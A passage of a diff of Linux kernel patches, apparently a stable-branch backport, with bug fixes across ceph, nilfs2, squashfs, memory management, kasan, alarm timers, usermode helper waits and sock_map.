++		pr_err("%s failed to blocklist %s: %d\n", __func__,
++		       ceph_pr_addr(&client->msgr.inst.addr), ret);
++
++	WARN(1, "%s: %s%sdo remount to continue%s",
++	     __func__, ret ? "" : ceph_pr_addr(&client->msgr.inst.addr),
++	     ret ? "" : " was blocklisted, ",
++	     err == -EIO ? " after corrupted snaptrace is fixed" : "");
++
+ 	return err;
+ }
+ 
+@@ -984,6 +1008,7 @@ void ceph_handle_snap(struct ceph_mds_client *mdsc,
+ 	__le64 *split_inos = NULL, *split_realms = NULL;
+ 	int i;
+ 	int locked_rwsem = 0;
++	bool close_sessions = false;
+ 
+ 	/* decode */
+ 	if (msg->front.iov_len < sizeof(*h))
+@@ -1092,8 +1117,12 @@ skip_inode:
+ 	 * update using the provided snap trace. if we are deleting a
+ 	 * snap, we can avoid queueing cap_snaps.
+ 	 */
+-	ceph_update_snap_trace(mdsc, p, e,
+-			       op == CEPH_SNAP_OP_DESTROY, NULL);
++	if (ceph_update_snap_trace(mdsc, p, e,
++				   op == CEPH_SNAP_OP_DESTROY,
++				   NULL)) {
++		close_sessions = true;
++		goto bad;
++	}
+ 
+ 	if (op == CEPH_SNAP_OP_SPLIT)
+ 		/* we took a reference when we created the realm, above */
+@@ -1112,6 +1141,9 @@ bad:
+ out:
+ 	if (locked_rwsem)
+ 		up_write(&mdsc->snap_rwsem);
++
++	if (close_sessions)
++		ceph_mdsc_close_sessions(mdsc);
+ 	return;
+ }
+ 
+diff --git a/fs/ceph/super.h b/fs/ceph/super.h
+index ae4126f634101..3599fefa91f99 100644
+--- a/fs/ceph/super.h
++++ b/fs/ceph/super.h
+@@ -100,6 +100,17 @@ struct ceph_mount_options {
+ 	char *mon_addr;
+ };
+ 
++/* mount state */
++enum {
++	CEPH_MOUNT_MOUNTING,
++	CEPH_MOUNT_MOUNTED,
++	CEPH_MOUNT_UNMOUNTING,
++	CEPH_MOUNT_UNMOUNTED,
++	CEPH_MOUNT_SHUTDOWN,
++	CEPH_MOUNT_RECOVER,
++	CEPH_MOUNT_FENCE_IO,
++};
++
+ #define CEPH_ASYNC_CREATE_CONFLICT_BITS 8
+ 
+ struct ceph_fs_client {
+diff --git a/fs/coredump.c b/fs/coredump.c
+index 095ed821c8ace..4d332f1471373 100644
+--- a/fs/coredump.c
++++ b/fs/coredump.c
+@@ -831,6 +831,30 @@ static int __dump_skip(struct coredump_params *cprm, size_t nr)
+ 	}
+ }
+ 
++int dump_emit(struct coredump_params *cprm, const void *addr, int nr)
++{
++	if (cprm->to_skip) {
++		if (!__dump_skip(cprm, cprm->to_skip))
++			return 0;
++		cprm->to_skip = 0;
++	}
++	return __dump_emit(cprm, addr, nr);
++}
++EXPORT_SYMBOL(dump_emit);
++
++void dump_skip_to(struct coredump_params *cprm, unsigned long pos)
++{
++	cprm->to_skip = pos - cprm->pos;
++}
++EXPORT_SYMBOL(dump_skip_to);
++
++void dump_skip(struct coredump_params *cprm, size_t nr)
++{
++	cprm->to_skip += nr;
++}
++EXPORT_SYMBOL(dump_skip);
++
++#ifdef CONFIG_ELF_CORE
+ static int dump_emit_page(struct coredump_params *cprm, struct page *page)
+ {
+ 	struct bio_vec bvec = {
+@@ -864,30 +888,6 @@ static int dump_emit_page(struct coredump_params *cprm, struct page *page)
+ 	return 1;
+ }
+ 
+-int dump_emit(struct coredump_params *cprm, const void *addr, int nr)
+-{
+-	if (cprm->to_skip) {
+-		if (!__dump_skip(cprm, cprm->to_skip))
+-			return 0;
+-		cprm->to_skip = 0;
+-	}
+-	return __dump_emit(cprm, addr, nr);
+-}
+-EXPORT_SYMBOL(dump_emit);
+-
+-void dump_skip_to(struct coredump_params *cprm, unsigned long pos)
+-{
+-	cprm->to_skip = pos - cprm->pos;
+-}
+-EXPORT_SYMBOL(dump_skip_to);
+-
+-void dump_skip(struct coredump_params *cprm, size_t nr)
+-{
+-	cprm->to_skip += nr;
+-}
+-EXPORT_SYMBOL(dump_skip);
+-
+-#ifdef CONFIG_ELF_CORE
+ int dump_user_range(struct coredump_params *cprm, unsigned long start,
+ 		    unsigned long len)
+ {
+diff --git a/fs/fscache/volume.c b/fs/fscache/volume.c
+index 903af9d85f8b9..cdf991bdd9def 100644
+--- a/fs/fscache/volume.c
++++ b/fs/fscache/volume.c
+@@ -280,8 +280,7 @@ static void fscache_create_volume_work(struct work_struct *work)
+ 	fscache_end_cache_access(volume->cache,
+ 				 fscache_access_acquire_volume_end);
+ 
+-	clear_bit_unlock(FSCACHE_VOLUME_CREATING, &volume->flags);
+-	wake_up_bit(&volume->flags, FSCACHE_VOLUME_CREATING);
++	clear_and_wake_up_bit(FSCACHE_VOLUME_CREATING, &volume->flags);
+ 	fscache_put_volume(volume, fscache_volume_put_create_work);
+ }
+ 
+diff --git a/fs/nilfs2/ioctl.c b/fs/nilfs2/ioctl.c
+index 87e1004b606d2..b4041d0566a9a 100644
+--- a/fs/nilfs2/ioctl.c
++++ b/fs/nilfs2/ioctl.c
+@@ -1114,7 +1114,14 @@ static int nilfs_ioctl_set_alloc_range(struct inode *inode, void __user *argp)
+ 
+ 	minseg = range[0] + segbytes - 1;
+ 	do_div(minseg, segbytes);
++
++	if (range[1] < 4096)
++		goto out;
++
+ 	maxseg = NILFS_SB2_OFFSET_BYTES(range[1]);
++	if (maxseg < segbytes)
++		goto out;
++
+ 	do_div(maxseg, segbytes);
+ 	maxseg--;
+ 
+diff --git a/fs/nilfs2/super.c b/fs/nilfs2/super.c
+index 6edb6e0dd61f7..1422b8ba24ed6 100644
+--- a/fs/nilfs2/super.c
++++ b/fs/nilfs2/super.c
+@@ -408,6 +408,15 @@ int nilfs_resize_fs(struct super_block *sb, __u64 newsize)
+ 	if (newsize > devsize)
+ 		goto out;
+ 
++	/*
++	 * Prevent underflow in second superblock position calculation.
++	 * The exact minimum size check is done in nilfs_sufile_resize().
++	 */
++	if (newsize < 4096) {
++		ret = -ENOSPC;
++		goto out;
++	}
++
+ 	/*
+ 	 * Write lock is required to protect some functions depending
+ 	 * on the number of segments, the number of reserved segments,
+diff --git a/fs/nilfs2/the_nilfs.c b/fs/nilfs2/the_nilfs.c
+index 2064e6473d304..3a4c9c150cbf5 100644
+--- a/fs/nilfs2/the_nilfs.c
++++ b/fs/nilfs2/the_nilfs.c
+@@ -544,9 +544,15 @@ static int nilfs_load_super_block(struct the_nilfs *nilfs,
+ {
+ 	struct nilfs_super_block **sbp = nilfs->ns_sbp;
+ 	struct buffer_head **sbh = nilfs->ns_sbh;
+-	u64 sb2off = NILFS_SB2_OFFSET_BYTES(bdev_nr_bytes(nilfs->ns_bdev));
++	u64 sb2off, devsize = bdev_nr_bytes(nilfs->ns_bdev);
+ 	int valid[2], swp = 0;
+ 
++	if (devsize < NILFS_SEG_MIN_BLOCKS * NILFS_MIN_BLOCK_SIZE + 4096) {
++		nilfs_err(sb, "device size too small");
++		return -EINVAL;
++	}
++	sb2off = NILFS_SB2_OFFSET_BYTES(devsize);
++
+ 	sbp[0] = nilfs_read_super_block(sb, NILFS_SB_OFFSET_BYTES, blocksize,
+ 					&sbh[0]);
+ 	sbp[1] = nilfs_read_super_block(sb, sb2off, blocksize, &sbh[1]);
+diff --git a/fs/squashfs/xattr_id.c b/fs/squashfs/xattr_id.c
+index b88d19e9581e9..c8469c656e0dc 100644
+--- a/fs/squashfs/xattr_id.c
++++ b/fs/squashfs/xattr_id.c
+@@ -76,7 +76,7 @@ __le64 *squashfs_read_xattr_id_table(struct super_block *sb, u64 table_start,
+ 	/* Sanity check values */
+ 
+ 	/* there is always at least one xattr id */
+-	if (*xattr_ids <= 0)
++	if (*xattr_ids == 0)
+ 		return ERR_PTR(-EINVAL);
+ 
+ 	len = SQUASHFS_XATTR_BLOCK_BYTES(*xattr_ids);
+diff --git a/include/linux/ceph/libceph.h b/include/linux/ceph/libceph.h
+index 00af2c98da75a..4497d0a6772cd 100644
+--- a/include/linux/ceph/libceph.h
++++ b/include/linux/ceph/libceph.h
+@@ -99,16 +99,6 @@ struct ceph_options {
+ 
+ #define CEPH_AUTH_NAME_DEFAULT   "guest"
+ 
+-/* mount state */
+-enum {
+-	CEPH_MOUNT_MOUNTING,
+-	CEPH_MOUNT_MOUNTED,
+-	CEPH_MOUNT_UNMOUNTING,
+-	CEPH_MOUNT_UNMOUNTED,
+-	CEPH_MOUNT_SHUTDOWN,
+-	CEPH_MOUNT_RECOVER,
+-};
+-
+ static inline unsigned long ceph_timeout_jiffies(unsigned long timeout)
+ {
+ 	return timeout ?: MAX_SCHEDULE_TIMEOUT;
+diff --git a/include/linux/fb.h b/include/linux/fb.h
+index bcb8658f5b64d..486c4e3b6d6a6 100644
+--- a/include/linux/fb.h
++++ b/include/linux/fb.h
+@@ -662,6 +662,7 @@ extern int  fb_deferred_io_init(struct fb_info *info);
+ extern void fb_deferred_io_open(struct fb_info *info,
+ 				struct inode *inode,
+ 				struct file *file);
++extern void fb_deferred_io_release(struct fb_info *info);
+ extern void fb_deferred_io_cleanup(struct fb_info *info);
+ extern int fb_deferred_io_fsync(struct file *file, loff_t start,
+ 				loff_t end, int datasync);
+diff --git a/include/linux/hugetlb.h b/include/linux/hugetlb.h
+index 770650d1ff842..58b53d08f2c8e 100644
+--- a/include/linux/hugetlb.h
++++ b/include/linux/hugetlb.h
+@@ -753,7 +753,10 @@ static inline struct hstate *hstate_sizelog(int page_size_log)
+ 	if (!page_size_log)
+ 		return &default_hstate;
+ 
+-	return size_to_hstate(1UL << page_size_log);
++	if (page_size_log < BITS_PER_LONG)
++		return size_to_hstate(1UL << page_size_log);
++
++	return NULL;
+ }
+ 
+ static inline struct hstate *hstate_vma(struct vm_area_struct *vma)
+diff --git a/include/linux/mm.h b/include/linux/mm.h
+index 974ccca609d2c..e5e8acf8eb895 100644
+--- a/include/linux/mm.h
++++ b/include/linux/mm.h
+@@ -136,7 +136,7 @@ extern int mmap_rnd_compat_bits __read_mostly;
+  * define their own version of this macro in <asm/pgtable.h>
+  */
+ #if BITS_PER_LONG == 64
+-/* This function must be updated when the size of struct page grows above 80
++/* This function must be updated when the size of struct page grows above 96
+  * or reduces below 56. The idea that compiler optimizes out switch()
+  * statement, and only leaves move/store instructions. Also the compiler can
+  * combine write statements if they are both assignments and can be reordered,
+@@ -147,12 +147,18 @@ static inline void __mm_zero_struct_page(struct page *page)
+ {
+ 	unsigned long *_pp = (void *)page;
+ 
+-	 /* Check that struct page is either 56, 64, 72, or 80 bytes */
++	 /* Check that struct page is either 56, 64, 72, 80, 88 or 96 bytes */
+ 	BUILD_BUG_ON(sizeof(struct page) & 7);
+ 	BUILD_BUG_ON(sizeof(struct page) < 56);
+-	BUILD_BUG_ON(sizeof(struct page) > 80);
++	BUILD_BUG_ON(sizeof(struct page) > 96);
+ 
+ 	switch (sizeof(struct page)) {
++	case 96:
++		_pp[11] = 0;
++		fallthrough;
++	case 88:
++		_pp[10] = 0;
++		fallthrough;
+ 	case 80:
+ 		_pp[9] = 0;
+ 		fallthrough;
+diff --git a/include/linux/shrinker.h b/include/linux/shrinker.h
+index 08e6054e061f3..258b615124b6b 100644
+--- a/include/linux/shrinker.h
++++ b/include/linux/shrinker.h
+@@ -104,7 +104,7 @@ extern void synchronize_shrinkers(void);
+ 
+ #ifdef CONFIG_SHRINKER_DEBUG
+ extern int shrinker_debugfs_add(struct shrinker *shrinker);
+-extern void shrinker_debugfs_remove(struct shrinker *shrinker);
++extern struct dentry *shrinker_debugfs_remove(struct shrinker *shrinker);
+ extern int __printf(2, 3) shrinker_debugfs_rename(struct shrinker *shrinker,
+ 						  const char *fmt, ...);
+ #else /* CONFIG_SHRINKER_DEBUG */
+@@ -112,8 +112,9 @@ static inline int shrinker_debugfs_add(struct shrinker *shrinker)
+ {
+ 	return 0;
+ }
+-static inline void shrinker_debugfs_remove(struct shrinker *shrinker)
++static inline struct dentry *shrinker_debugfs_remove(struct shrinker *shrinker)
+ {
++	return NULL;
+ }
+ static inline __printf(2, 3)
+ int shrinker_debugfs_rename(struct shrinker *shrinker, const char *fmt, ...)
+diff --git a/include/linux/stmmac.h b/include/linux/stmmac.h
+index fb2e88614f5d1..313edd19bf545 100644
+--- a/include/linux/stmmac.h
++++ b/include/linux/stmmac.h
+@@ -252,6 +252,7 @@ struct plat_stmmacenet_data {
+ 	int rss_en;
+ 	int mac_port_sel_speed;
+ 	bool en_tx_lpi_clockgating;
++	bool rx_clk_runs_in_lpi;
+ 	int has_xgmac;
+ 	bool vlan_fail_q_en;
+ 	u8 vlan_fail_q;
+diff --git a/include/net/sock.h b/include/net/sock.h
+index e0517ecc65315..1f868764575c3 100644
+--- a/include/net/sock.h
++++ b/include/net/sock.h
+@@ -2430,6 +2430,19 @@ static inline __must_check bool skb_set_owner_sk_safe(struct sk_buff *skb, struc
+ 	return false;
+ }
+ 
++static inline struct sk_buff *skb_clone_and_charge_r(struct sk_buff *skb, struct sock *sk)
++{
++	skb = skb_clone(skb, sk_gfp_mask(sk, GFP_ATOMIC));
++	if (skb) {
++		if (sk_rmem_schedule(sk, skb, skb->truesize)) {
++			skb_set_owner_r(skb, sk);
++			return skb;
++		}
++		__kfree_skb(skb);
++	}
++	return NULL;
++}
++
+ static inline void skb_prepare_for_gro(struct sk_buff *skb)
+ {
+ 	if (skb->destructor != sock_wfree) {
+diff --git a/kernel/sched/psi.c b/kernel/sched/psi.c
+index 7f40d87e8f509..48fedeee15c5b 100644
+--- a/kernel/sched/psi.c
++++ b/kernel/sched/psi.c
+@@ -1278,10 +1278,11 @@ void psi_trigger_destroy(struct psi_trigger *t)
+ 
+ 	group = t->group;
+ 	/*
+-	 * Wakeup waiters to stop polling. Can happen if cgroup is deleted
+-	 * from under a polling process.
++	 * Wake up waiters to stop polling and clear the queue to prevent it from
++	 * being accessed later. Can happen if the cgroup is deleted from under a
++	 * polling process.
+ 	 */
+-	wake_up_interruptible(&t->event_wait);
++	wake_up_pollfree(&t->event_wait);
+ 
+ 	mutex_lock(&group->trigger_lock);
+ 
+diff --git a/kernel/time/alarmtimer.c b/kernel/time/alarmtimer.c
+index 5897828b9d7ed..7e5dff602585d 100644
+--- a/kernel/time/alarmtimer.c
++++ b/kernel/time/alarmtimer.c
+@@ -470,11 +470,35 @@ u64 alarm_forward(struct alarm *alarm, ktime_t now, ktime_t interval)
+ }
+ EXPORT_SYMBOL_GPL(alarm_forward);
+ 
+-u64 alarm_forward_now(struct alarm *alarm, ktime_t interval)
++static u64 __alarm_forward_now(struct alarm *alarm, ktime_t interval, bool throttle)
+ {
+ 	struct alarm_base *base = &alarm_bases[alarm->type];
++	ktime_t now = base->get_ktime();
++
++	if (IS_ENABLED(CONFIG_HIGH_RES_TIMERS) && throttle) {
++		/*
++		 * Same issue as with posix_timer_fn(): timers which are
++		 * periodic but whose signal is ignored can starve the system
++		 * with a very small interval. The real fix which was
++		 * promised in the context of posix_timer_fn() never
++		 * materialized, but someone should really work on it.
++		 *
++		 * To prevent DOS, fake @now to be 1 jiffie out, which keeps
++		 * the overrun accounting correct but creates an
++		 * inconsistency vs. timer_gettime(2).
++		 */
++		ktime_t kj = NSEC_PER_SEC / HZ;
++
++		if (interval < kj)
++			now = ktime_add(now, kj);
++	}
++
++	return alarm_forward(alarm, now, interval);
++}
+ 
+-	return alarm_forward(alarm, base->get_ktime(), interval);
++u64 alarm_forward_now(struct alarm *alarm, ktime_t interval)
++{
++	return __alarm_forward_now(alarm, interval, false);
+ }
+ EXPORT_SYMBOL_GPL(alarm_forward_now);
+ 
+@@ -551,9 +575,10 @@ static enum alarmtimer_restart alarm_handle_timer(struct alarm *alarm,
+ 	if (posix_timer_event(ptr, si_private) && ptr->it_interval) {
+ 		/*
+ 		 * Handle ignored signals and rearm the timer. This will go
+-		 * away once we handle ignored signals proper.
++		 * away once we handle ignored signals proper. Ensure that
++		 * small intervals cannot starve the system.
+ 		 */
+-		ptr->it_overrun += alarm_forward_now(alarm, ptr->it_interval);
++		ptr->it_overrun += __alarm_forward_now(alarm, ptr->it_interval, true);
+ 		++ptr->it_requeue_pending;
+ 		ptr->it_active = 1;
+ 		result = ALARMTIMER_RESTART;
+diff --git a/kernel/trace/trace_events.c b/kernel/trace/trace_events.c
+index 2a2ea9b6f7625..e679239864965 100644
+--- a/kernel/trace/trace_events.c
++++ b/kernel/trace/trace_events.c
+@@ -155,7 +155,7 @@ int trace_define_field(struct trace_event_call *call, const char *type,
+ }
+ EXPORT_SYMBOL_GPL(trace_define_field);
+ 
+-int trace_define_field_ext(struct trace_event_call *call, const char *type,
++static int trace_define_field_ext(struct trace_event_call *call, const char *type,
+ 		       const char *name, int offset, int size, int is_signed,
+ 		       int filter_type, int len)
+ {
+diff --git a/kernel/umh.c b/kernel/umh.c
+index 8506315186652..fbf872c624cbc 100644
+--- a/kernel/umh.c
++++ b/kernel/umh.c
+@@ -438,21 +438,27 @@ int call_usermodehelper_exec(struct subprocess_info *sub_info, int wait)
+ 	if (wait == UMH_NO_WAIT)	/* task has freed sub_info */
+ 		goto unlock;
+ 
+-	if (wait & UMH_KILLABLE)
+-		state |= TASK_KILLABLE;
+-
+ 	if (wait & UMH_FREEZABLE)
+ 		state |= TASK_FREEZABLE;
+ 
+-	retval = wait_for_completion_state(&done, state);
+-	if (!retval)
+-		goto wait_done;
+-
+ 	if (wait & UMH_KILLABLE) {
++		retval = wait_for_completion_state(&done, state | TASK_KILLABLE);
++		if (!retval)
++			goto wait_done;
++
+ 		/* umh_complete() will see NULL and free sub_info */
+ 		if (xchg(&sub_info->complete, NULL))
+ 			goto unlock;
++
++		/*
++		 * fallthrough; in case of -ERESTARTSYS now do uninterruptible
++		 * wait_for_completion_state(). Since umh_complete() shall call
++		 * complete() in a moment if xchg() above returned NULL, this
++		 * uninterruptible wait_for_completion_state() will not block
++		 * SIGKILL'ed processes for long.
++		 */
+ 	}
++	wait_for_completion_state(&done, state);
+ 
+ wait_done:
+ 	retval = sub_info->retval;
+diff --git a/mm/filemap.c b/mm/filemap.c
+index 08341616ae7a1..322aea78058a0 100644
+--- a/mm/filemap.c
++++ b/mm/filemap.c
+@@ -2569,18 +2569,19 @@ static int filemap_get_pages(struct kiocb *iocb, struct iov_iter *iter,
+ 	struct folio *folio;
+ 	int err = 0;
+ 
++	/* "last_index" is the index of the page beyond the end of the read */
+ 	last_index = DIV_ROUND_UP(iocb->ki_pos + iter->count, PAGE_SIZE);
+ retry:
+ 	if (fatal_signal_pending(current))
+ 		return -EINTR;
+ 
+-	filemap_get_read_batch(mapping, index, last_index, fbatch);
++	filemap_get_read_batch(mapping, index, last_index - 1, fbatch);
+ 	if (!folio_batch_count(fbatch)) {
+ 		if (iocb->ki_flags & IOCB_NOIO)
+ 			return -EAGAIN;
+ 		page_cache_sync_readahead(mapping, ra, filp, index,
+ 				last_index - index);
+-		filemap_get_read_batch(mapping, index, last_index, fbatch);
++		filemap_get_read_batch(mapping, index, last_index - 1, fbatch);
+ 	}
+ 	if (!folio_batch_count(fbatch)) {
+ 		if (iocb->ki_flags & (IOCB_NOWAIT | IOCB_WAITQ))
+diff --git a/mm/gup.c b/mm/gup.c
+index eb8d7baf9e4d3..028f3b4e8c3f2 100644
+--- a/mm/gup.c
++++ b/mm/gup.c
+@@ -1978,7 +1978,7 @@ static unsigned long collect_longterm_unpinnable_pages(
+ 			drain_allow = false;
+ 		}
+ 
+-		if (!folio_isolate_lru(folio))
++		if (folio_isolate_lru(folio))
+ 			continue;
+ 
+ 		list_add_tail(&folio->lru, movable_page_list);
+diff --git a/mm/huge_memory.c b/mm/huge_memory.c
+index 811d19b5c4f60..e7cf013a0efd0 100644
+--- a/mm/huge_memory.c
++++ b/mm/huge_memory.c
+@@ -3253,8 +3253,6 @@ void remove_migration_pmd(struct page_vma_mapped_walk *pvmw, struct page *new)
+ 	pmde = mk_huge_pmd(new, READ_ONCE(vma->vm_page_prot));
+ 	if (pmd_swp_soft_dirty(*pvmw->pmd))
+ 		pmde = pmd_mksoft_dirty(pmde);
+-	if (is_writable_migration_entry(entry))
+-		pmde = maybe_pmd_mkwrite(pmde, vma);
+ 	if (pmd_swp_uffd_wp(*pvmw->pmd))
+ 		pmde = pmd_wrprotect(pmd_mkuffd_wp(pmde));
+ 	if (!is_migration_entry_young(entry))
+@@ -3262,6 +3260,10 @@ void remove_migration_pmd(struct page_vma_mapped_walk *pvmw, struct page *new)
+ 	/* NOTE: this may contain setting soft-dirty on some archs */
+ 	if (PageDirty(new) && is_migration_entry_dirty(entry))
+ 		pmde = pmd_mkdirty(pmde);
++	if (is_writable_migration_entry(entry))
++		pmde = maybe_pmd_mkwrite(pmde, vma);
++	else
++		pmde = pmd_wrprotect(pmde);
+ 
+ 	if (PageAnon(new)) {
+ 		rmap_t rmap_flags = RMAP_COMPOUND;
+diff --git a/mm/kasan/common.c b/mm/kasan/common.c
+index 833bf2cfd2a39..21e66d7f261de 100644
+--- a/mm/kasan/common.c
++++ b/mm/kasan/common.c
+@@ -246,6 +246,9 @@ bool __kasan_slab_free(struct kmem_cache *cache, void *object,
+ 
+ static inline bool ____kasan_kfree_large(void *ptr, unsigned long ip)
+ {
++	if (!kasan_arch_is_ready())
++		return false;
++
+ 	if (ptr != page_address(virt_to_head_page(ptr))) {
+ 		kasan_report_invalid_free(ptr, ip, KASAN_REPORT_INVALID_FREE);
+ 		return true;
+diff --git a/mm/kasan/generic.c b/mm/kasan/generic.c
+index d8b5590f9484b..4967988fb3c67 100644
+--- a/mm/kasan/generic.c
++++ b/mm/kasan/generic.c
+@@ -191,7 +191,12 @@ bool kasan_check_range(unsigned long addr, size_t size, bool write,
+ 
+ bool kasan_byte_accessible(const void *addr)
+ {
+-	s8 shadow_byte = READ_ONCE(*(s8 *)kasan_mem_to_shadow(addr));
++	s8 shadow_byte;
++
++	if (!kasan_arch_is_ready())
++		return true;
++
++	shadow_byte = READ_ONCE(*(s8 *)kasan_mem_to_shadow(addr));
+ 
+ 	return shadow_byte >= 0 && shadow_byte < KASAN_GRANULE_SIZE;
+ }
+diff --git a/mm/kasan/shadow.c b/mm/kasan/shadow.c
+index 0e3648b603a6f..ecb7acb3897cd 100644
+--- a/mm/kasan/shadow.c
++++ b/mm/kasan/shadow.c
+@@ -291,6 +291,9 @@ int kasan_populate_vmalloc(unsigned long addr, unsigned long size)
+ 	unsigned long shadow_start, shadow_end;
+ 	int ret;
+ 
++	if (!kasan_arch_is_ready())
++		return 0;
++
+ 	if (!is_vmalloc_or_module_addr((void *)addr))
+ 		return 0;
+ 
+@@ -459,6 +462,9 @@ void kasan_release_vmalloc(unsigned long start, unsigned long end,
+ 	unsigned long region_start, region_end;
+ 	unsigned long size;
+ 
++	if (!kasan_arch_is_ready())
++		return;
++
+ 	region_start = ALIGN(start, KASAN_MEMORY_PER_SHADOW_PAGE);
+ 	region_end = ALIGN_DOWN(end, KASAN_MEMORY_PER_SHADOW_PAGE);
+ 
+@@ -502,6 +508,9 @@ void *__kasan_unpoison_vmalloc(const void *start, unsigned long size,
+ 	 * with setting memory tags, so the KASAN_VMALLOC_INIT flag is ignored.
+ 	 */
+ 
++	if (!kasan_arch_is_ready())
++		return (void *)start;
++
+ 	if (!is_vmalloc_or_module_addr(start))
+ 		return (void *)start;
+ 
+@@ -524,6 +533,9 @@ void *__kasan_unpoison_vmalloc(const void *start, unsigned long size,
+  */
+ void __kasan_poison_vmalloc(const void *start, unsigned long size)
+ {
++	if (!kasan_arch_is_ready())
++		return;
++
+ 	if (!is_vmalloc_or_module_addr(start))
+ 		return;
+ 
+diff --git a/mm/khugepaged.c b/mm/khugepaged.c
+index e0c7bbd69b33e..77a76bcf15f57 100644
+--- a/mm/khugepaged.c
++++ b/mm/khugepaged.c
+@@ -2608,6 +2608,7 @@ static int madvise_collapse_errno(enum scan_result r)
+ 	case SCAN_CGROUP_CHARGE_FAIL:
+ 		return -EBUSY;
+ 	/* Resource temporary unavailable - trying again might succeed */
++	case SCAN_PAGE_COUNT:
+ 	case SCAN_PAGE_LOCK:
+ 	case SCAN_PAGE_LRU:
+ 	case SCAN_DEL_PAGE_LRU:
+diff --git a/mm/memblock.c b/mm/memblock.c
+index fc3d8fbd2060d..511d4783dcf1d 100644
+--- a/mm/memblock.c
++++ b/mm/memblock.c
+@@ -1640,13 +1640,7 @@ void __init memblock_free_late(phys_addr_t base, phys_addr_t size)
+ 	end = PFN_DOWN(base + size);
+ 
+ 	for (; cursor < end; cursor++) {
+-		/*
+-		 * Reserved pages are always initialized by the end of
+-		 * memblock_free_all() (by memmap_init() and, if deferred
+-		 * initialization is enabled, memmap_init_reserved_pages()), so
+-		 * these pages can be released directly to the buddy allocator.
+-		 */
+-		__free_pages_core(pfn_to_page(cursor), 0);
++		memblock_free_pages(pfn_to_page(cursor), cursor, 0);
+ 		totalram_pages_inc();
+ 	}
+ }
+diff --git a/mm/migrate.c b/mm/migrate.c
+index dff333593a8ae..8d5c0dc618a57 100644
+--- a/mm/migrate.c
++++ b/mm/migrate.c
+@@ -215,6 +215,8 @@ static bool remove_migration_pte(struct folio *folio,
+ 			pte = maybe_mkwrite(pte, vma);
+ 		else if (pte_swp_uffd_wp(*pvmw.pte))
+ 			pte = pte_mkuffd_wp(pte);
++		else
++			pte = pte_wrprotect(pte);
+ 
+ 		if (folio_test_anon(folio) && !is_readable_migration_entry(entry))
+ 			rmap_flags |= RMAP_EXCLUSIVE;
+diff --git a/mm/shrinker_debug.c b/mm/shrinker_debug.c
+index b05295bab3222..39c3491e28a3e 100644
+--- a/mm/shrinker_debug.c
++++ b/mm/shrinker_debug.c
+@@ -246,18 +246,21 @@ int shrinker_debugfs_rename(struct shrinker *shrinker, const char *fmt, ...)
+ }
+ EXPORT_SYMBOL(shrinker_debugfs_rename);
+ 
+-void shrinker_debugfs_remove(struct shrinker *shrinker)
++struct dentry *shrinker_debugfs_remove(struct shrinker *shrinker)
+ {
++	struct dentry *entry = shrinker->debugfs_entry;
++
+ 	lockdep_assert_held(&shrinker_rwsem);
+ 
+ 	kfree_const(shrinker->name);
+ 	shrinker->name = NULL;
+ 
+-	if (!shrinker->debugfs_entry)
+-		return;
++	if (entry) {
++		ida_free(&shrinker_debugfs_ida, shrinker->debugfs_id);
++		shrinker->debugfs_entry = NULL;
++	}
+ 
+-	debugfs_remove_recursive(shrinker->debugfs_entry);
+-	ida_free(&shrinker_debugfs_ida, shrinker->debugfs_id);
++	return entry;
+ }
+ 
+ static int __init shrinker_debugfs_init(void)
+diff --git a/mm/vmscan.c b/mm/vmscan.c
+index 96eb9da372cd7..dc66f6715bfc4 100644
+--- a/mm/vmscan.c
++++ b/mm/vmscan.c
+@@ -740,6 +740,8 @@ EXPORT_SYMBOL(register_shrinker);
+  */
+ void unregister_shrinker(struct shrinker *shrinker)
+ {
++	struct dentry *debugfs_entry;
++
+ 	if (!(shrinker->flags & SHRINKER_REGISTERED))
+ 		return;
+ 
+@@ -748,9 +750,11 @@ void unregister_shrinker(struct shrinker *shrinker)
+ 	shrinker->flags &= ~SHRINKER_REGISTERED;
+ 	if (shrinker->flags & SHRINKER_MEMCG_AWARE)
+ 		unregister_memcg_shrinker(shrinker);
+-	shrinker_debugfs_remove(shrinker);
++	debugfs_entry = shrinker_debugfs_remove(shrinker);
+ 	up_write(&shrinker_rwsem);
+ 
++	debugfs_remove_recursive(debugfs_entry);
++
+ 	kfree(shrinker->nr_deferred);
+ 	shrinker->nr_deferred = NULL;
+ }
+diff --git a/net/core/dev.c b/net/core/dev.c
+index 70e06853ba255..7a2a4650a8988 100644
+--- a/net/core/dev.c
++++ b/net/core/dev.c
+@@ -10385,7 +10385,7 @@ void netdev_stats_to_stats64(struct rtnl_link_stats64 *stats64,
+ 
+ 	BUILD_BUG_ON(n > sizeof(*stats64) / sizeof(u64));
+ 	for (i = 0; i < n; i++)
+-		dst[i] = atomic_long_read(&src[i]);
++		dst[i] = (unsigned long)atomic_long_read(&src[i]);
+ 	/* zero out counters that only exist in rtnl_link_stats64 */
+ 	memset((char *)stats64 + n * sizeof(u64), 0,
+ 	       sizeof(*stats64) - n * sizeof(u64));
+diff --git a/net/core/sock_map.c b/net/core/sock_map.c
+index 22fa2c5bc6ec9..a68a7290a3b2b 100644
+--- a/net/core/sock_map.c
++++ b/net/core/sock_map.c
+@@ -1569,15 +1569,16 @@ void sock_map_unhash(struct sock *sk)
+ 	psock = sk_psock(sk);
+ 	if (unlikely(!psock)) {
+ 		rcu_read_unlock();
+-		if (sk->sk_prot->unhash)
+-			sk->sk_prot->unhash(sk);
+-		return;
++		saved_unhash = READ_ONCE(sk->sk_prot)->unhash;
++	} else {
++		saved_unhash = psock->saved_unhash;
++		sock_map_remove_links(sk, psock);
++		rcu_read_unlock();
+ 	}
+-
+-	saved_unhash = psock->saved_unhash;
+-	sock_map_remove_links(sk, psock);
+-	rcu_read_unlock();
+-	saved_unhash(sk);
++	if (WARN_ON_ONCE(saved_unhash == sock_map_unhash))
++		return;
++	if (saved_unhash)
++		saved_unhash(sk);
+ }
+ EXPORT_SYMBOL_GPL(sock_map_unhash);
+ 
+@@ -1590,17 +1591,18 @@ void sock_map_destroy(struct sock *sk)
+ 	psock = sk_psock_get(sk);
+ 	if (unlikely(!psock)) {
+ 		rcu_read_unlock();
+-		if (sk->sk_prot->destroy)
+-			sk->sk_prot->destroy(sk);
+-		return;
++		saved_destroy = READ_ONCE(sk->sk_prot)->destroy;
++	} else {
++		saved_destroy = psock->saved_destroy;
++		sock_map_remove_links(sk, psock);
++		rcu_read_unlock();
++		sk_psock_stop(psock);
++		sk_psock_put(sk, psock);
+ 	}
+-
+-	saved_destroy = psock->saved_destroy;
+-	sock_map_remove_links(sk, psock);
+-	rcu_read_unlock();
+-	sk_psock_stop(psock);
+-	sk_psock_put(sk, psock);
+-	saved_destroy(sk);
